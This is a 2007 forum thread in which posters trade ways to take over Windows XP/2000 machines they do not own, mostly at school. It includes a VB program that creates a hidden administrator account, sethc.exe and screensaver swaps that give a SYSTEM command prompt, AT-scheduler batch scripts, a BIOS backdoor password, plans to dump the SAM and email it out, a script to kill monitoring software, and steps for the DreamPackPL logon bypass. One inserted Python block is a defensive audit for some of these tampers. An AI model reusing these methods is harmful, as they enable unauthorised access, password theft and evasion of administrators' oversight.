therealdonquixote (Posted February 13, 2007)

You could always write some code into msgina.dll, which is what the login is, with a hidden button that runs CMD. That'd spawn as SYSTEM. Sweet idea. Got a file that we might be able to test?
Arikirangi (Posted February 14, 2007)

> A BIOS chip cannot be backdoored or cracked on an OEM machine. If it is a custom-built machine then there are some backdoor passwords out there, but they rarely work. So that leaves you SOL.

Thanks mate, gave me an idea. I went to http://www.uktsupport.co.uk/reference/biosp.htm and found a reasonable list of BD passwords for the Award BIOS. It seems my target has a cheap MB, and AWARD_PW worked great. I have full access now to boot CD / USB and can now go about the simple task of pilfering the SAM. BTW, it was not a matter of the case being locked, but as in most cases the security cameras make it too "James Bond" to open the case without bad consequences.
Deveant (Posted February 14, 2007)

Haha, thx for the lockpicking comic, that was pretty interesting. I think though I'm now gonna be sitting here with my old Lockmaster lock trying to pick it all night :P
Arikirangi (Posted February 14, 2007)

Oh, and sorry for multiple posting. It may be a good idea in my case to insert some code into a file an admin would access on login, which would be able to copy the SAM to an unsecured part of the OS / email it to Gmail whenever the admin logs in, so I don't have to keep accessing the PC via boot disk when the admin routinely changes the PWD. That would put me one step ahead.

Also, I believe the domain admin password is different from the local PWD in terms of how the hash is stored. Is the domain PWD stored on the local machine in XP / 2k? How does the stored domain PWD compare to the local PWD in terms of hash? Can these PWDs be broken with normal LM rainbow tables?
ShadowHax (Posted February 18, 2007)

Here's a patch code that will add a new username + password, but will ask you for the creds, then it will delete the new admin from the user list, so that it is not visible from the fast-switch menu. Then it will open a cmd prompt, not sure what good that will do. I have provided a compiled version of the VB code here: http://www.rrko.com/dev/AddUser.exe

```vb
Module HakXP
    Sub Main()
        Console.Write("Enter new username: ")
        Dim uName As String = Console.ReadLine()
        Console.Write("Enter password for " + uName + " : ")
        Dim pWord As String = Console.ReadLine()
        AddUser(uName, pWord)
        RunProcess("C:\WINDOWS\system32", "cmd.exe")  'Will open up a cmd prompt at C:\WINDOWS\system32
    End Sub

    Sub AddUser(ByVal UserName As String, ByVal Password As String)
        Shell("net user " + UserName + " " + Password + " /add")     'Adds the user "UserName" with password "Password"
        Shell("net localgroup administrators " + UserName + " /add") 'Adds "UserName" to the admin group
        Shell("net localgroup users " + UserName + " /delete")       'Removes "UserName" from Users so it does not show up in the Fast User Switching list
    End Sub

    Sub RunProcess(ByVal Path As String, ByVal Exe As String)
        Dim px As New Process
        px.StartInfo.WorkingDirectory = Path
        px.StartInfo.FileName = Exe
        px.Start()
    End Sub
End Module
```

Another possible approach... If you were to make a new Windows service and create it under the SYSTEM account and set it to automatic, it would automatically start at load, no matter who was logged in. This could be a possible way to retrieve passwords? I'm working on it, have all the code, just need some filler code for the hack.

--ShadowHax
blackdeath42 (Posted February 18, 2007)

OK. If you have write access to the registry then this will work:

- Open Regedit
- Go to HKEY_USERS\.DEFAULT\Control Panel\Desktop
- Double click on SCRNSAVE.EXE
- Change logon.scr to cmd.exe
- Change ScreenSaveTimeOut from 600 to 10
- Save and exit the editor and log out
- After 10 seconds, the cmd prompt should appear and will have SYSTEM privileges
- Then do the net user hack
- You're done

You can do some pretty neat things with the SCRNSAVE.EXE variable, e.g. Minesweeper before you log on! :D
ShadowHax (Posted February 18, 2007)

I have compiled a screen saver that will open a command prompt when executed. You may have to open taskmgr to kill the screen saver, cus I made it transparent. Here is the link to the compiled screen saver:

http://rrko.com/dev/scrncmd.zip
http://rrko.com/dev/AddUser.zip

--ShadowHax
The Brain (Posted February 26, 2007)

Does the replacement of either utilman.exe or services.exe need to be a 16-bit app? If not, are there any other restrictions on the file? Could I also simply rename a .bat file to utilman.exe? I tried to replace it with cmd.exe; it seems to be started after pressing [Win]+ but I can't see it?! :( And BTW: does it also have SYSTEM privileges when started from the Start menu?
m0u53 (Posted March 6, 2007)

Copy explorer.exe from C:/WINNT/windows, paste it to a folder other than C:/WINNT/windows, rename it to explorer.scr, right click > Install, go to Display > Screensaver > explorer.scr, restart, have fun.

Also an idea would be to download pwdump and make a .bat file to dump the passes to the C:/ dir, cuz that's what will pop up, so you can use the password at that time and log in to the admin and unlock your account. I have done this at my school countless times. I went into the registry and set it to run every 1 second, and well, yeah, I have a 2 hour class, so do the math :) XD

-m0u53
ShadowHax (Posted March 8, 2007)

The only problem with this is that some "locations" (erm, my school) have not only blocked utilman / cmd / service / all other Windows apps from being replaced, they also locked off the display settings. The one thing they did forget is compmgmt.msc though =) Any suggestions on how I could bypass this, without booting a live distro or floppy? thx
azurith (Posted March 23, 2007)

> Module HakXP
>     Sub Main()
>         Console.Write("Enter new username: ")
>         Dim uName As String = Console.ReadLine()
>         Console.Write("Enter password for " + uName + " : ")
>         Dim pWord As String = Console.ReadLine()
>         AddUser(uName, pWord)
>         RunProcess("C:\WINDOWS\system32", "cmd.exe")  'Will open up a cmd prompt at C:\WINDOWS\system32
>     End Sub
>     Sub AddUser(ByVal UserName As String, ByVal Password As String)
>         Shell("net user " + UserName + " " + Password + " /add")     'Adds the user "UserName" with password "Password"
>         Shell("net localgroup administrators " + UserName + " /add") 'Adds "UserName" to the admin group
>         Shell("net localgroup users " + UserName + " /delete")       'Removes "UserName" from Users so it does not show up in the Fast User Switching list
>     End Sub
>     Sub RunProcess(ByVal Path As String, ByVal Exe As String)
>         Dim px As New Process
>         px.StartInfo.WorkingDirectory = Path
>         px.StartInfo.FileName = Exe
>         px.Start()
>     End Sub
> End Module

This should make it work under either XP Home or Pro, and the install directory for XP shouldn't matter anymore.

Here's my update:

```vb
Module HakXP
    Sub Main()
        Console.Write("Enter new username: ")
        Dim uName As String = Console.ReadLine()
        Console.Write("Enter password for " + uName + " : ")
        Dim pWord As String = Console.ReadLine()
        AddUser(uName, pWord)
        'Will open up a cmd prompt at %systemroot%\system32. The variable has to be
        'expanded explicitly: .NET does not expand %...% in WorkingDirectory by itself.
        RunProcess(Environment.ExpandEnvironmentVariables("%systemroot%\system32"), "cmd.exe")
    End Sub

    Sub AddUser(ByVal UserName As String, ByVal Password As String)
        Shell("net user " + UserName + " " + Password + " /add")     'Adds the user "UserName" with password "Password"
        Shell("net localgroup administrators " + UserName + " /add") 'Adds "UserName" to the admin group
        Shell("net localgroup users " + UserName + " /delete")       'Removes "UserName" from Users so it does not show up in the Fast User Switching list
    End Sub

    Sub RunProcess(ByVal Path As String, ByVal Exe As String)
        Dim px As New Process
        px.StartInfo.WorkingDirectory = Path
        px.StartInfo.FileName = Exe
        px.Start()
    End Sub
End Module
```

%systemroot% is the equivalent of typing C:\Windows or D:\Windows, or whatever drive you installed Windows on. It also doesn't require admin privs, most of the time. (I'm not sure if it can be disabled.) Anyways, I hope that helps somewhat. I think it may also work for Windows NT now also. If I remember right, I think the Windows NT root directory is 'C:\WinNT' or something similar. So it should also work. Could you recompile the code and test it with the new code? Thankies!

~~Azurith

PS>> The updated code should make it compatible with NT & XP. The install drive of Windows should no longer matter.
The Brain (Posted April 6, 2007)

Very interesting so far :D I'm working on a solution to put the CMD on the login screen :twisted: But now that I have admin privileges on the local machine, I'd like to know how to gain those on the domain (like Arikirangi said). I don't have the possibility of creating a domain here at home, so if anyone has: is pwdump (or any other tool like that) able to read out the domain passwords after you logged into the domain as a "normal" user and start pwdump afterwards? I assume it'll only read out the local hashes, but I think it's worth a try.
m0u53 (Posted April 11, 2007)

I know for sure if you can pull up a command prompt you can edit files, right? So what if one was to have XP/Linux/98 on a CD and, before a reboot, change the boot.ini file to boot off of the CD or flash drive? Also, autoexec.bat: couldn't this be tampered with, and doesn't this run programs or commands before the XP GUI screen? If so, that could be tampered with as well.

I have a Dell laptop issued by our school. The 1st semester everyone used net user administrator * to change the admin password and gain "root"; then near the end of the 1st semester EVERYONE had Halo on their laptops. This pissed off the admins greatly. They took up everyone's laptops and put Novell ZENworks Desktop Management 7 on them, and now if a program isn't launched through Novell then it terminates no matter what it is; even important programs like updates are denied. And then most recently they fux0r1ng took our entire taskbar, and there is only one way out of it: Taskkill /IM <processname> [long story I know but it's true sadly] <-- brand new school. This fast lil miracle is the only way anyone can run anything.

So what I would do is first create a bat file:

```batch
@echo off
tasklist >>Tasks.txt
```

Then, looking through the tasks, try and point out some key tasks. Let's say you find "norton" or something (although I doubt ANY school admin would be retarded enough to run such an evil bl00dsux1ng program). Best bet is to Google it. If it becomes obvious that this program isn't required, kill it as soon as possible. Then create a bat file containing:

```batch
@echo off
TaskKill /IM norton.exe
```

If you keep adding to the file then you can make a nice lil bat file that will make you invisible, or well, sorta. This is good for remote management and other programs they use to monitor your activities. Also, when you kill these tasks be sure they are really "dead" by running tasklist again, as some programs will fight you tooth and nail to the death, or so to speak!
The Brain (Posted April 17, 2007)

%systemroot%\system32\sethc.exe: replace it with cmd.exe, boot into Windows and press SHIFT five times. A command prompt with SYSTEM privileges will pop up (not tested).

---

Download DreamPackPL and replace %systemroot%\System32\sfcfiles.dll with the downloaded one (I'm not sure if it works with Windows XP, I only tested it in my W2K).

---

Download WinlogonHijack and run it from a service or anything else with SYSTEM privileges (I didn't test it yet, but the author claims it to work 100%). It'll log all passwords of logins to a file (but I don't know if it catches network PWs (i.e. domain PWs) too).

---

Now I've got a question: kickarse posted a link to a nice paper about NT's login. Now, does anybody have a link to a similar paper about W2K, XP or maybe even Vista? Also I'd like to know if the passwords for domain logins are saved anywhere (cached or just temporarily in memory)? If so, it should be possible to save them somehow. :twisted: The L0phtcrack crew wrote a utility to catch these passwords in an NT network; it's called something like Blabla SMB... maybe there's a new version available? Let me know and thanks :D
GonZor (Posted April 24, 2007)

This is a great idea. I ran into a couple of problems so I thought I would share my solutions. First of all I'd like to say that I am aware most people will not have access to the AT command, but for the few people that may be in a similar situation to me...

My situation: I DO NOT have local admin privileges, but I do have higher privileges than standard users. I need access to a SYSTEM cmd to bypass policy without drawing attention to myself from other students. I am unable to simply replace the file from Windows, and booting from other media is not possible.

OK, anyone that's in a similar situation to me, here's my solution:

```batch
@ECHO off
ECHO @ECHO off>%systemroot%\sethc.bat
ECHO REN %systemroot%\system32\sethc.exe sethc.bak>>%systemroot%\sethc.bat
ECHO COPY %systemroot%\system32\cmd.exe %systemroot%\system32\sethc.exe>>%systemroot%\sethc.bat
ECHO DEL %systemroot%\sethc.bat /q
SET /a nextmin=(%time:~3,2% + 1)
SET newtime=%time:~0,3%%nextmin%
AT %newtime% /interactive %systemroot%\sethc.bat
```

Fairly simple code... VERY simple code... but if anyone wants an explanation let me know. I'm just too lazy to do it right now.

NOTE - I purposely used cmd. I am aware I could just create a local admin account, but that is not what I need.

EDIT - Just to clarify, I could just use

```batch
SET /a nextmin=(%time:~3,2% + 1)
SET newtime=%time:~0,3%%nextmin%
AT %newtime% /interactive cmd
```

but I want to be able to close the cmd prompt easily and reopen it when necessary, which is why I chose the longer version.

If you would like the restore file, here it is. I forgot to post it because I don't have a need for it:

```batch
@ECHO off
DEL %systemroot%\system32\sethc.exe
REN %systemroot%\system32\sethc.bak sethc.exe
```
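A defender-side check for two of the tamper points discussed in this thread: blackdeath42's change to the pre-logon SCRNSAVE.EXE value, and the sethc.exe / utilman.exe swap from The Brain's and GonZor's posts. This is an added example, not code from any poster; it assumes Python 3, and the sample state it checks is constructed inline.

```python
"""Audit helpers for the XP-era tampering described in this thread (added
example, not from any poster). The pure functions take plain dicts so they
can run offline; collect_system32_hashes() fills such a dict on a live host."""
import hashlib
import ntpath
import os
from pathlib import Path

ACCESSIBILITY_BINARIES = ("sethc.exe", "utilman.exe")
DEFAULT_LOGON_SAVER = "logon.scr"   # default pre-logon saver named in the thread
DEFAULT_TIMEOUT = 600               # default ScreenSaveTimeOut named in the thread


def find_swapped_binaries(hashes):
    """hashes: {filename: sha256}. Return the accessibility binaries whose
    content is byte-identical to cmd.exe, i.e. the swap the thread describes."""
    cmd_hash = hashes.get("cmd.exe")
    if cmd_hash is None:
        return []
    return sorted(n for n in ACCESSIBILITY_BINARIES if hashes.get(n) == cmd_hash)


def check_logon_screensaver(values):
    """values: registry values read from HKEY_USERS\\.DEFAULT\\Control Panel\\Desktop.
    Returns a list of findings; empty means nothing looks odd."""
    findings = []
    saver = values.get("SCRNSAVE.EXE", "")
    # ntpath handles Windows-style paths even when this runs on a non-Windows host.
    if saver and ntpath.basename(saver).lower() != DEFAULT_LOGON_SAVER:
        findings.append(f"pre-logon SCRNSAVE.EXE is {saver!r}, not {DEFAULT_LOGON_SAVER}")
    try:
        timeout = int(values.get("ScreenSaveTimeOut", DEFAULT_TIMEOUT))
    except ValueError:
        timeout = DEFAULT_TIMEOUT
    if timeout < 60:
        findings.append(f"ScreenSaveTimeOut is {timeout}s (default {DEFAULT_TIMEOUT})")
    return findings


def sha256_file(path):
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 16), b""):
            digest.update(chunk)
    return digest.hexdigest()


def collect_system32_hashes(system32=None):
    """Live collector: hash cmd.exe and the accessibility binaries in System32."""
    base = Path(system32 or os.path.join(os.environ.get("SystemRoot", r"C:\Windows"), "System32"))
    return {n: sha256_file(base / n) for n in ("cmd.exe",) + ACCESSIBILITY_BINARIES
            if (base / n).is_file()}


# Constructed sample state: sethc.exe matches cmd.exe, utilman.exe is intact, and the
# logon screen saver has been pointed at cmd.exe with a 10 second timeout.
SAMPLE_HASHES = {"cmd.exe": "aa" * 32, "sethc.exe": "aa" * 32, "utilman.exe": "bb" * 32}
SAMPLE_DESKTOP_VALUES = {"SCRNSAVE.EXE": "cmd.exe", "ScreenSaveTimeOut": "10"}

if __name__ == "__main__":
    print("swapped:", find_swapped_binaries(SAMPLE_HASHES))
    for line in check_logon_screensaver(SAMPLE_DESKTOP_VALUES):
        print("finding:", line)
```

The basename comparison also flags m0u53's explorer.scr variant, since anything other than logon.scr in the .DEFAULT hive is reported.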
amish (Posted May 13, 2007)

Well, what I do is this. I made a small bat file with this code:

```batch
time 12:20:00
at 12:30 /INTERACTIVE cmd.exe /k NET TIME \\bournside4 /SET /YES
time 12:29:58
```

Spawns an admin shell in 2 seconds, and because my school has a time server I can sync the time back :D But your school won't have one, I don't think. So you will need to note the time and reset it manually with the "time" command.

```batch
time 12:20:00
at 12:30 /INTERACTIVE cmd.exe /k dir
time 12:29:58
```

The above code you can use, and it will work on any computer anywhere.
GonZor (Posted May 14, 2007)

> ...Spawns an admin shell in 2 seconds, and because my school has a time server I can sync the time back :D But your school won't have one, I don't think. So you will need to note the time and reset it manually with the "time" command...

Actually my school does sync the time, but I also use this in other locations. I did add a line of code to mine but didn't see the need to update my previous post:

```batch
TIME = %newtime%
```

which will execute immediately. But your idea of changing the time back can be easily implemented if you add these three lines to the end of my code (excluding the line above):

```batch
SET proptime=%time%
TIME = %newtime%
TIME = %proptime%
```

In which case the %newtime% variable/calculation becomes redundant, because the time will be changed back anyway and only be a second out, but if that second is worth it to you, you could correct it.
Anthrax (Posted May 29, 2007)

I had an idea the other day. Assuming you find a locked computer with admin rights, is it possible to put one of these executables on a flash drive so that when you insert the flash drive it automatically runs the .exe?

1. Not sure if you can launch a process while the computer is locked.
2. Not sure how the autorun feature will react.

Maybe someone would like to give this a go.
lord (Posted June 4, 2007)

Thought for the first day I may contribute...

ACCESS ADMINISTRATOR'S ACCOUNT.

1. Get physical access to the machine. Remember that it must have a CD or DVD drive.
2. Download DreamPackPL from the official website or from Rapidshare OR CLICK ON THE LINK (go here: hxxp: www. d--b. webpark. pl/dreampackpl_en. htm).
3. Unzip the downloaded dreampackpl_iso.zip and you'll get dreampackpl.ISO.
4. Use any burning program that can burn ISO images.
5. After you have the disk, boot from the CD or DVD drive. You will see Windows 2000 Setup and it will load some files.
6. Press "R" to install DreamPackPL.
7. Press "C" to install DreamPackPL by using the recovery console.
8. Select the Windows installation that is currently on the computer (normally it is "1" if you only have one Windows installed).
9. Back up your original sfcfiles.dll by typing: "ren C:\Windows\System32\sfcfiles.dll sfcfiles.lld" (without quotes).
10. Copy the hacked file from the CD to the system32 folder. Type: "copy D:\i386\pinball.ex_ C:\Windows\System32\sfcfiles.dll" (without quotes and assuming your CD drive is D:).
11. Type "exit", take out the disk and reboot.
12. In the password field, type "dreamon" (without quotes) and the DreamPack menu will appear.
13. Click the top graphic on the DreamPack menu and you will get a menu popup.
14. Go to Commands, enable the options and enable the god command.
15. Type "god" in the password field to get into Windows. You can also go to Passwords and select "Logon with wrong password and hash". This option allows you to log in with ANY password.
The Brain (Posted June 8, 2007)

I mentioned it above 8-) But does this also work with network login? Anyone tested so far?
GonZor (Posted June 8, 2007)

> I mentioned it above 8-) But does this also work with network login? Anyone tested so far?

It all depends on the intelligence of the system admin. If they are smart the passwords won't be cached, but many system admins are stupid and leave the passwords cached.
XxSnipedYouxX (Posted June 19, 2007)

Can't you do this easily by booting into safe mode, then opening Control Panel, going to User Accounts, clicking on your account, then on Change Account Type, and changing to system administrator, so you can bypass all this stuff? I don't know if it works on other systems, but it works on mine.
GonZor (Posted June 19, 2007)

> Can't you do this easily by booting into safe mode, then opening Control Panel, going to User Accounts, clicking on your account, then on Change Account Type, and changing to system administrator, so you can bypass all this stuff? I don't know if it works on other systems, but it works on mine.

Wouldn't that require already having the pass? ;)
XxSnipedYouxX (Posted June 19, 2007)

I just tried it and it worked, but then again when I went to log on I just clicked on the administrator account and it wasn't password protected, and I couldn't try it on another account because all of them have admin access. You could always give it a try if you want to though.
GonZor (Posted June 19, 2007)

> I just tried it and it worked, but then again when I went to log on I just clicked on the administrator account and it wasn't password protected, and I couldn't try it on another account because all of them have admin access. You could always give it a try if you want to though.

I know it won't work, well at least not on any of my machines; all my accounts have passwords. This method relies on computers not having an admin password, which everyone should have.